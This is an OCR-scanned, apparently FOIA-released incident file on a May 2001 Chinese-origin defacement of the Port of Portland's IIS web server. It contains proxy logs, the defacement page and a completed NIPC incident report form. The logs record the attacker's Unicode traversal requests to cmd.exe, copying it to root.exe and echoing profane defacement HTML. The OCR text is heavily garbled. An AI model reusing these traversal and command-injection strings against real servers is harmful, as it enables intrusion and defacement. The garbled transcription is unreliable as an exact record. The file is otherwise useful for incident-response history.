r result-"200 OK" proto-http rule-388 
May 04 00:40:56.608 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d=6uR88 sent=70 rcvd-598 srcif-Vpn6 src-211.96.252.251/50599 cldst-207 
.109.247.150/80 svsrc-10.96.0.1/5333 dstif-Vpn5 dst-10.96.0.5/80 op=GE 
T arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+di 
r+..\\ result="200 OK" proto-http rule=388 
May 04 00:40:57.031 quebec httpd[325]: 121 Statistics: duration=0.05 i 
d-6uR8a sent-100 rcvd-382 srcif-Vpn6 src=211.96.252.251/50600 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5334 dstif=Vpn5 dst=10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/ct+c 
opy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" pro 
to=http rule=388 
May 04 00:40:57.476 quebec httpd[325]: 121 Statistics: duration=0.08 i 
d=6uR8c sent=423 revd=355 srcif=Vpn6 src=211.96.252.251/50601 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5335 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg-http://10.96.0.5/scripts/root.exe?/crecho-^«html^»^«body-4bgcolo 
+x%3Dblack^>^<br^>^<br^>^<br^>^<bz^>^<br^>^<br^>^<tab1e+width%3D100%^>^ 
<td*>*<p+align%3D%22center%22*>*<font+size$3D7+color$3Dred*>fuck+USA+G 
overnment^«c«/font^»^«tr^»^«td^»^«pralign$3D£22cen result="502 Gateway E 
rror" proto-http rule=388 
May 04 00:40:57.877 quebec httpd[325]: 121 Statistics: duration-0.04 i 
d=6uR8e sent=423 rcvd-355 srcif-Vpn6 src-211.96.252.251/50653 cldst=20 
7.109.247.150/80 svsrc=10.96.0.1/5336 dstif-Vpn5 dst=10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/ctecho+*<html*>*<body+bgcolo 
r$3Dblack^»^«br^»-^«br^»^«br^»^«br^»^«br^»^«br^»^«table-c-width$3D100$^»^ 
<td*>*<p+align%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<p+align%3D%22cen result="502 Gateway E 
rror" proto-http rule=388 
May 04 00:40:58.268 quebec httpd[325]: 121 Statistics: duration-0.03 i 
d=6uR8g sent=425 rcvd-355 srcif-Vpn6 src-211.96.252.251/50704 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5337 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=httP://10.96.0.5/scripts/root. exe?/c+echo+^<htm1^>^<body+bgcolo 
r$3Dblack^»^«br^»^«br^»-^«br^»^«br^»^«br^»^«br^»^«table-width$3D100$^»^ 
<td*>*<pt+align%3D%22center$22*>*<font+size%3D7+color$3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<p+talign%3D%22cen result="502 Gateway E 
rror" proto-http rule=388 
May 04 00:40:58.670 quebec httpd[325]: 121 Statistics: duration-0.03 i 
d=6uR8i sent=425 revd=355 srcif-Vpn6 src-211.96.252.251/50755 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5338 dstif-Vpn5 dst=10.96.0.5/80 op=G 
ET arg=httpP://10.96.0.5/scribpts/root. exe? /c+echo+^<htm1^>^<body+bgcolo 
+z%3Db1ack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<tab1e+width%3D100%^>^ 
<td*>*<p+align%3D%22center%22*>*<font+size$3D7+color$3Dred*>fuck+USA+G 
overnment*</font*>*<tr%*>*<td*>*<ptalign%3D%22cen result="502 Gateway E 
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rror" proto=http rule=388 

May 04 00:40:59.068 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d=6uR8k sent=100 revd=382 srcif-Vpn6 src-211.96.252.251/50756 cldst=20 
7.109.247.150/80 svsrc=10.96.0.1/5339 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg-http://10.96.0.5/scripts/..$c0$af../winnt/system32/cmd.exe?/c4c 
opy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" pro 
to-http rule-388 

May 04 00:40:59.521 quebec httpd[325]: 121 Statistics: duration=0.08 i 
d-6uR8m sent=424 rcvd-355 srcif-Vpn6 src-211.96.252.251/50757 cldst-20 
7.109.247.150/80 svsrc-10.96.0.1/5340 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<htm1^>^<bođy+bgcolo 
r$3Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«table-width$3D100$^»^ 
<td*>“<p+align%3D%22center%22*°>*<font+size$3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<p+talign%3D%22cen result="502 Gateway E 
rror" proto=http rule=388 
May 04 00:40:59.928 quebec httpd[325]: 121 Statistics: duration-0.04 i 
d-6uR80 sent=424 rcvd-355 srcif-Vpn6 src=211.96.252.251/50808 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5341 đstif=Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<htm1^>^<body+bgcolo 
r$3Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«tablecwidth$3D100$^»-^ 
<td*>*<p+align%3D%22center$22*>*<font+size%3D7+color$3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<p+talign$3D%22cen result="502 Gateway E 
rror" proto=http rule=388 

May 04 00:41:00.317 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d-6uR8q sent=426 rcvd=355 srcif-Vpn6 src-211.96.252.251/50809 cldst=20 
7.109.247.150/80 svsrc=10.96.0.1/5342 dstif=Vpn5 dst=10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/c+echo+*<html*>*<body+bgcolo 
x33Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<tab1e+width%3D100%^>^ 
<td*>*<p+align%3D%22center%22*>*<font+size$3D7+color%3Dred*>fuck+USA+G 
©vernment^</£ont^>^<tr^>^<tđ^>^<p+align2»3D%22cen result="502 Gateway E 
rror" proto-http rule=388 

May 04 00:41:00.710 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d-6uR8s sent=426 revd=355 srcif-Vpn6 src=211.96.252.251/50810 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5343 dstif-Vpn5 dst=10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe? /c+echo+^<htm1^>^<body+bgcolo 
xz33Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<bx^>^<tab1le+width%3D100%^>^ 
<td*>*<p+align%3D%22center%$22*>*<font+size%3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<ptalign%3D%22cen result="502 Gateway E 
rror" proto-http rule=388 
May 04 00:41:01.115 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d=6uR8u sent=100 rcvd-382 srcif-Vpn6 src-211.96.252.251/50861 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5344 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg-http://10.96.0.5/scripts/..$c0$af../winnt/system32/cmd.exe?/c-«c 
opy+\\winnt\\system32\\cmd.exet+root.exe result="502 Gateway Error" pro 
to-http rule-388 : 
May 04 00:41:01.561 quebec httpd[325]: 121 Statistics: duration-0.08 i 
d-6uR8w sent-429 revd=355 srcif-Vpn6 src=211.96.252.251/50862 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5345 dstif-Vpn5 dst-10.96.0.5/80 op-G 
ET arg=http://10.96.0.5/scripts/root. exe?/c+echo+^<htm1^>^<boäy+bgcolo 
+%3Db1ack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^ 
<tđ^>^<p+a1l1gn%3D3%22center%22^>^<font+size%3D7+colox%3Dred^>£uck+USA+G 
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©vernment^</£ont^>^<trz^>^<td^>^<p+align%3D%22cen result="502 Gateway E 
rror" proto=http rule=388 

May 04 00:41:01.962 quebec httpd[325]: 121 Statistics: duration=0.04 i 
d-6uR8y sent-429 rcvd-355 srcif-Vpn6 src-211.96.252.251/50863 cldst-20 
7.109.247.150/80 svsrc=10.96.0.1/5346 dstif=Vpn5 dst-10.96.0.5/80 op=G 
ET arg=httb://10.96.0.5/scripts/root. exe? /c+echo+^<htm1^>^<body+bgco1Lo 
+%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D1008%^>^ 
<t3^>^<p+a1ign%3D%22center%22^>^<£ont+size%3D7+colox%3Dreä^>£uck+USA+G 
overnment^«/font^»^«tr^»^«td^»^«pralign$3D$22cen result-"502 Gateway E 
rror" proto-http rule-388 

May 04 00:41:02.357 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d=6uR8A sent-431 rcvd-355 srcif-Vpn6 src=211.96.252.251/50864 cldst-20 
7.109.247.150/80 svsrc-10.96.0.1/5347 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/ctecho+*<htm1l*>*<body+bgcolo 
+%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^ 
<td*>“*<p+align%3D%22center$22*>*<font+size$3D7+color%3Dred*>fuck+USA+G 
overnment^«/font^»^«tr^»^«td^»^«ptalign$3D$22cen result="502 Gateway E 
rror" proto-http rule-388 

May 04 00:41:02.777 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d-6uR8C sent=431 rcvd-355 srcif-Vpn6 src-211.96.252.251/50865 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5348 dstif-Vpn5 dst-10.96.0.5/80 opsG 
ET arg=http://10.96.0.5/scripts/root.exe?/ctecho+*<html*>*<body+bgcolo 
r$3Dblack^-^«br^»^«br^»^«br^»^«bpr^»^«br^»^«br^»-^«table-width$3D100$^-2^ 
<td*>*<ptaligns3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<ptalign%3D%22cen result="502 Gateway E 
rror" proto=http rule=388 

May 04 00:41:03.174 quebec httpd[325]: 121 Statistics: duration=0.04 i 
đ=6uR8E sent=100 rcvd-382 srcif-Vpn6 src-211.96.252.251/50916 cldst=20 
7.109.247.150/80 svsrc=10.96.0.1/5349 đstif=Vpn5 dst=10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/ct+c 
opy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" pro 
to=http rule=388 

May 04 00:41:03.622 quebec httpd[325]: 121 Statistics: duration=0.08 i 
d=6uR8G sent-432 rcvd-355 srcif-Vpn6 src-211.96.252.251/51021 cldst-20 
7.109.247.150/80 svsrc=10.96.0.1/5350 dstif=Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe? /c+echo+^<htm1^>^<body+bgcolo 
+z%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^ 
<td*>*<p+align%3D%22center$22*>*<font+size%3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<p+talign%3D%22cen result="502 Gateway E 
rror" proto=http rule=388 

May 04 00:41:04.024 quebec httpd[325]: 121 Statistics: duration=0.04 i 
d=6uR8I sent-432 rcvd-355 srcif-Vpn6 src=211.96.252.251/51022 cldst=20 
7.109.247.150/80 svsrc=10.96.0.1/5351 dstif=Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/ctechot+“*<html*>*<body+bgcolo 
r%3Db1ack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^ 
<td^>^<p+align%3D%22cente+r3%22^>^<£ont+size%3D7+col1or%3Dređ^>£uck+USA+G 
Overnment^</£ont^>^<tr^>^<tä^>^<p+a1ign%3D%22cen result-"502 Gateway E 
rror" proto-http rule-388 

May 04 00:41:04.441 quebec httpd[325]: 121 Statistics: duration=0.05 i 
d-6uR8K sent-434 rcvd-355 srcif-Vpn6 src-211.96.252.251/51023 cldst=20 
7.109.247.150/80 svsrc=10.96.0.1/5352 dstif=Vpn5 dst-10.96.0.5/80 op=G 
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ET arg=http://10.96.0.5/scripts/root.exe?/c+echo+*<html*>*<body+bgcolo 
x%3Db1ack^>^<br^>^<br^>^<bx^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^ 
<td^>^<p+a1lign%3D322center%22^>^<£font+size%3D7+colox%3Dred^>£uck+USA+G 
overnment*</font*>*<tr*>*<td*>*<p+align$3D%22cen result="502 Gateway E 
rror" proto-http rule-388 
May 04 00:41:04.835 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d=6uR8M sent=434 rcvd=355 srcif-Vpn6 src-211.96.252.251/51024 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5353 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/ct+echo+*<htm1l*>*<body+bgcolo 
x%3Db1ack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+wiđdth$%3D100%^>^ 
<t3^>^<p+a1li1gn%3D%22center%22^>^<£ont+size%3D7+col1ox%3Dreä^>£uck+USA+G 
Overnment^</£font^>^<tr^>^<tđ^>^<p+align33D3%22cen result="502 Gateway E 
rror" proto=http rule-388 
May 04 00:41:05.228 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d-6uR80 sent-100 revd=382 srcif-Vpn6 src-211.96.252.251/51075 cldst=20 
7.109.247.150/80 svsrc=10.96.0.1/5354 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg-http://10.96.0.5/scripts/..$cOSaf../winnt/system32/cmd.exe?/c-4c 
opy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" pro 
to=http rule=388 
May 04 00:41:05.675 quebec httpd[325]: 121 Statistics: duration=0.09 i 
d=6uR8Q sent-429 rcvd-355 srcif-Vpn6 src-211.96.252.251/51076 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5355 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/c+echo+*<html*>*<body+bgcolo 
x%3Db1ack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^ 
<td*>*<p+align%3D%$22center%22*>*<font+size%3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<p+align%3D%22cen result="502 Gateway E 
rror" proto-http rule=388 
May 04 00:41:06.079 quebec httpd[325]: 121 Statistics: duration-0.03 i 
d-6uR8S sent=429 rcvd-355 srcif-Vpn6 src-211.96.252.251/51127 cldst-20 
7.109.247.150/80 svsrc-10.96.0.1/5358 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/c+echo+*<htm1*>*<body+bgcolo 
x%3Dblack^>^<br^>^<br^>^<bz^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^ 
<td*>*<p+align%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+USA+G 
overnment^«/font^»^«tr^»^«td^»^«pralign$3D$22cen result="502 Gateway E 
rror" proto-http rule-388 
May 04 00:41:06.472 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d-6uR8U sent-431 rcvd-355 srcif-Vpn6 src-211.96.252.251/51128 cldst-20 
7.109.247.150/80 svsrc-10.96.0.1/5359 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/sc+ripts/root. exe?/c+echo+^<htm1^>^<body+bgcolo 
x%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<brz^>^<table+width%3D100%^>^ 
<t3^>^<p+a1l1gn%3D%22center%22^>^<£ont+size%3D7+co1or%3Dred^>£fuck+USA+G 
Overnment^</font^>^<tr^>^<tđ^>^<p+align%3D%22cen result="502 Gateway E 
rror" proto-http rule-388 
May 04 00:41:06.880 quebec httpd[325]: 121 Statistics: duration=0.04 i 
d-6uR8W sent-431 rcvd-355 srcif-Vpn6 src-211.96.252.251/51129 cldst-20 
7.109.247.150/80 svsrc-10.96.0.1/5360 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<htm1^>^<body+bgcolo 
r$3Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«table-width£$3D100£^»-^ 
<td*>“<ptalign%3D%22center$22*>*<font+size$3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<p+align%3D%22cen result="502 Gateway E 
rror" proto=http rule=388 
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C 


chilog 
May 04 00:41:07.274 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d-6uR8Y sent=100 rcvd-382 srcif-Vpn6 src-211.96.252.251/51130 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5361 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/ct+c 
opy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" pro 
to=http rule-388 
May 04 00:41:07.735 quebec httpd[325]: 121 Statistics: duration=0.09 i 
d-6uR90 sent-429 revd=355 srcif-Vpn6 src-211.96.252.251/51131 cldst-20 
7.109.247.150/80 svsrc-10.96.0.1/5362 dstif-Vpn5 dst=10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/ctecho+*<html*>*<body+bgcolo 
+z33Dblack^>^<br^>^<br^>^<br^>^<brz^>^<br^>^<br^>^<tablLe+width%3D100%^>^ 
<td*>*<p+align%3D%22center$22*>*<font+size$3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>“<ptalign%3D%22cen result="502 Gateway E 
rror" proto=http rule=388 
May 04 00:41:08.141 quebec httpd[325]: 121 Statistics: duration=0.04 i 
d-6uR92 sent=429 rcvd-355 srcif-Vpn6 src=211.96.252.251/51186 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5363 dstif=Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe? /c+echo+^<htm1^>^<bođy+bgcolo 
xz33Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<tab1e+width%3D100%^>^ 
<td*>“<p+align%3D%22center%22*>*<font+size%3D7+color$3Dred*>fuck+USA+G 
overnment^«/font^»^«tr^»^«td^-^«p*align$3D$22cen result-"502 Gateway E 
rror" proto-http rule-388 
May 04 00:41:08.539 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d=6uR94 sent-431 revd=355 srcif-Vpn6 src-211.96.252.251/51287 cldst=20 
7.109.247.150/80 svsrcz10.96.0.1/5364 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/xroot.exe?/c+echo+^<htm1^>^<body+bgcolo 
r%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<tab1e+width%3D100%^>^ 
<td*>*<ptalign%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<ptalign%3D%22cen result="502 Gateway E 
rror" proto=http rule=388 
May 04 00:41:08.934 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d=6uR96 sent=431 revd=355 srcif-Vpn6 src-211.96.252.251/51288 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5365 dstif-Vpn5 dst=10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root. exe? /c+echo+^<htm1^>^<body+bgcolo 
r33Db1lack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+wiđdth%3D100%^>^ 
<td*>*<ptalign%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+USA+G 
Overnment^< /£ont^>^<tr^>^<tđ^>^<p+align%3D%22cen result="502 Gateway E 
rror" proto-http rule=388 
May 04 00:41:09.327 quebec httpd[325]: 121 Statistics: duration-0.03 i 
d-6uR98 sent-78 rcvd-718 srcif-Vpn6 src-211.96.252.251/51289 cldst=207 
.109.247.150/80 svsrc=10.96.0.1/5366 dstif-Vpn5 dst=10.96.0.5/80 op=GE 
T arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+di 
r+..\\wwwroot\\ result="200 OK" proto-http rule=388 
May 04 00:41:09.729 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d=6uR9a sent-100 rcvd-382 srcif-Vpn6 src=211.96.252.251/51290 cldst=20 
7.109.247.150/80 svsrc-10.96.0.1/5367 dstif=Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/..%c0%af.. /winnt/system32 /cmởd. ene? /C+c 
opy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" pro 
to=http rule=388 
May 04 00:41:10.167 quebec httpd[325]: 121 Statistics: duration=0.07 i 
d=6uR9c sent=431 rcvd-355 srcif-Vpn6 src-211.96.252.251/51345 cldst=20 
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7.109.247.150/80 svsrc-10.96.0.1/5368 dstif-Vpn5 dst=10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<htm1^>^<body+bgcolo 
r$3Dblack^»^«br^»-^«br^»^«br^»^«br^»^«br^»^«br^»^«table-width$3D100£$^-^ 
<td*>“<ptalign%3D%22center$22*>*<font+size%3D7+color%3Dred*>fuck+USA+G 
overnment^«/font^»^«tr^»^«td^»^«pralign$3D$22cen result="502 Gateway E 
rror" proto=http rule-388 . 
May 04 00:41:10.564 quebec httpd[325]: 121 Statistics: duration=0.04 i 
d=6uR9e sent=431 revd=355 srcif-Vpn6 src-211.96.252.251/51346 cldst-20 
7.109.247.150/80 svsrc-10.96.0.1/5369 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root. exe? /c+echo+^<html^>^<body+bgcolo 
rS3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<table+width%3D100%*>* 
<td*>*<ptalign%3D%22center$22*>*<font+size$3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<ptalign%3D%22cen result="502 Gateway E 
rror" proto=http rule=388 
May 04 00:41:10.959 quebec httpd[325]: 121 Statistics: duration=0.03 i 
d-6uR9g sent-433 revd=355 srcif-Vpn6 src-211.96.252.251/51347 cldst=20 
7.109.247.150/80 svsrc=10.96.0.1/5370 dstif-Vpn5 dst-10.96.0.5/80 op=G 
ET arg=http://10.96.0.5/scripts/root.exe?/ct+techo+*<html*>*<body+bgcolo 
x%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<tab1e+width%3D100%^>^ 
<td*>*<ptalign%3D%22center%22*>*<font+size$3D7+color%3Dred*>fuck+USA+G 
overnment*</font*>*<tr*>*<td*>*<ptalign$3D%22cen result-"502 Gateway E 
rror" proto-http rule=388 
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fuck USA Government 
fuck PoizonBOx 


contact:sysadmcn Q yahoo.com.cn 


<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p 
align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p 
align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p 

align="center"><font size=4 color=red>contact: sysadmen@yahoo.com.cn</htm1> 
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Cyber Threat and Computer Intrusion 
Incident Reporting Guidelines 


This form may be used as a guide or vehicle for reporting cyber threat and computer intrusion 
incident information to the NIPC or other law enforcement organization. It is recommended that these 
Cyber Incident Reporting Guidelines be used when submitting a report to a local FBI Field Office. 


Do NOT include CLASSIFIED information on this form unless you adhere to applicable procedures 
for proper marking, handling and transmission of classified information. Please contact NIPC Watch 
Operations Center (202) 323-3205 to arrange secure means to submit classified information. 


information concerning the identity of the reporting agency, department, company, or individual(s) 
will be treated on a confidential basis, If additional information is required, you will be contacted 
directly. 


Report Date/Time: {May 7, 2001 3:05PM. 


Point of Contact (POC) Information 


b6 
b7c 


E-mai 


State: {Oregon _ ` 


Zip Code: ¡97209 


http://www.nipc.gov/incident/Cirr.htm 5/7/2001 
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* D 


Country: JUSA 


I ĐEN TÊN TT TP SƠ) 


Incident Information 


Name of Organization: (if same as above, enter "BAME") 


Street: jsame 


9 


121 NW Everett 
Portland Oregon 97209 


3. Date/Time and duration of incident|05/03/2001 3:46am PDT ` 


4. Is the affected system/network critical to the organization? 
- € Yes No 


5. Critical Infrastructure séctor(s) affected. (Check all that apply) 


L1 Power [i Transportation 

[ Banking and Finance L3 Emergency Services 

D Government Operations [-1 Water Supply Systems 

LÍ Gas & Oil Storage and Delivery IS) Other (Provide details in remarks) 
D Telecommunications | LÍ Not applicable 


RemarKs:lTnternet mail and fax system 


hLtp://www.nipc.gov/ineident/cir.htm 5/7/2001 


05/08/2001 TUE 07:03 FAX — s 
National Infrastructure M `) Center (NIPC) - Incident Report - s Ñ Property L.. Page 3 of 6 
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6. Nature of Problem? (Check all that apply) 


L1 intrusion [1 System impairment/denia! resources 
D Unauthorized root access [7l Web site defacement 

Li Compromise of system integrity D Hoax 

D Theft D Damage 


D) Unknown [3 Other: 


7. Has this problem been experience before? (If yes, please explain in remarks section): 
O Yes & No 


Remarks:iNo Remarks 


e 


8. Suspect method of intrusion/attack 


L1 Virus (provide name if known) i Vulnerability exploited (explain) 
D Denial of Service . D Trojan horse ` 

D Distributed Denial of Service [1 Trapdoor 

[1 Unknown [i Other (Provide details in remarks) 


Remarks:jHacker exploited the identified 
problem with Microsoft IIS on hotfix 
M800-078 that allow a malicious 
hacker to run programs on the web 


BEC VET — iwi 


9. Suspectperpetrator(s) or possible motivation(s) of the attack 


D tnsider/Disgruntted employee Ci Former employee 
FJ] Competitor [7] Other (Explain in remarks) 
LJ Unknown 


Remarks:||This appears to be an attack from the 1 
Chinese mainland on our website. | 


————— 


11. Evidence of spoofing? 
C Yes € No 
G Unknown 


http://www.nipc.gov/incident/cirr.htm. 5/7/2001 
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D ‡ . 
12. What computers/systems (hardware and software) were affected? (Operating system, 
version): 
D Unix Lios2 
D Linux L1 VAX/VMS 
FINT L] Windows 
D Sun OS/Solaris L1 Other (Provide specify in remarks) 


Remarks:;jNo Remarks 


J———————————— et 


13. Security Infrastructure in place. (Check all that apply) 
D Incident/Emergency Response Team {2 Encryption 


DU Firewall D Secure Remote Access/Authorization tools 
[intrusion Detection System [.] Banners 
D Security Auditing Tools D Access Control Lists 
D Packet filtering 
14. Didthe intrusion/attack result in a loss/compromise of sensitive, classifed.or proprietary 
information? 
C Yes (Provide details in remarks) G No 
G Unknown 


Remarks]It does not appear at this time that 
the attack was for anything other 
than to deface the site. 


—€—————————————————— M—— ïï man... nam 


15. Did the intrusion/attack result in damage to system(s) or data? 
O Yes (Provide details in remarks) ® No 


Remarks:lother than the replacement of the 
affected web pages. 


— # 


16. Whatactions and technical mitigation have been taken? 
D System(s) disconnected from the network D System Binaries checked 


[7] Other (Please provide details in 
femarks) 


[7i Log files examined L.] No action(s) 


D Backup of affected system(s) 


Remarks: 


http://www.nipc.gov/incident/cirr.htm 


5/7/2001 


Wong 
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> 


All relevant hot fixes to the server 
are being installed at this time. 


— rr —— — ———  ——X————Ó En 


17. Has the local FBI field office been informed? 


© Yes (Which Offre. € No 
18. Has another agency/organization been informed? If so, please provide name and phone 
number. 
© Yes G No 


s State/local police: 


ATEM Cesena ata 
e Other (Incident Response, law enforcement,etc.) 


19. When was the last time your system was modified or update? 
H 


Date: [approximately 4/29/2001 | 
Company/Organization that did work (Address, phone, POC information): 


20. 1s the System Administrator a contractor? 
O Yes (Provide POC Information) © No 


21. In addition to being used for law enforcement or national security purposes, the intrusion- 
related information | reported may be shared with: 


[^ The Public E7 InfraGard Members with Secure Access 


22. Additional Remarks: (Please limit to 500 characters. Amplifying information may be submitted 


separately.) 


http://www.nipc.gov/incident/cirr.htm 


S/7nn1 


006 


— —.— — ———.- 
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The attack involved changing four files on the 
internet server in approximately seven 
different directories (dcfault.htm, 
default.asp, index.htm, and index.asp). The 
files were written with the following text: 


FUCK USA Government 
FUCK PoizonBox 
contact:sysadmenG yahoo. com.cn 


—Ó—À—— € M €—  —À n — 1 T ———— enel 


If the reported incident is determined to be a criminal matter you may be contacted by an agent for 
additional information. 


T 


http://www.nipc.gov/incident/cirr.htm 5/7/2001 


| | b6 
b7C 


From 

* Sent ay, May 14, 2001 2:20 PM 
To: 
Subject: China web defacement request 


alert.ixt defauli.him In010508.1og 


requested for the China attack. The log is an 
IIS log file that shows the actual process they used in the attack. 


<<alert.ixt>> ««default.htm»» <<in010503.log>> ««alert.ixt»» 
<<index.htm>> 


Port of Portland 


index.htm 


[ ] here are the files you b6 
b7C 


b6 
b7C 


K 


alert 
ët Network Associates GroupShield Exchange pd 
******** Alert generated at: Monday, May 14, 2001 02:19:57 PM Pacific 
Daylight Time 


kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkěkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


kkkkkkkkkk 


The file đefault.asp has been replaced. 
Please consult your ađministrator for further help 
and remember to quote your ticket number: 0A3_989875197_PORTEX1 
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fuck USA Government 
fuck PoizonBOx 


contact:sysadmcn Q yahoo.com.cn 


FW: Cyber Incident Report Formes. Page 1 of2 
a e 
|ee| e |sg|se || x | ow |? "gees 
From: bế 
b7C 

To: 

Ce: 

Subject: FW: Cyber Incident Report Form 

Sent: 5/9/01 3:36 PM Importance: Normal 
From; bề 
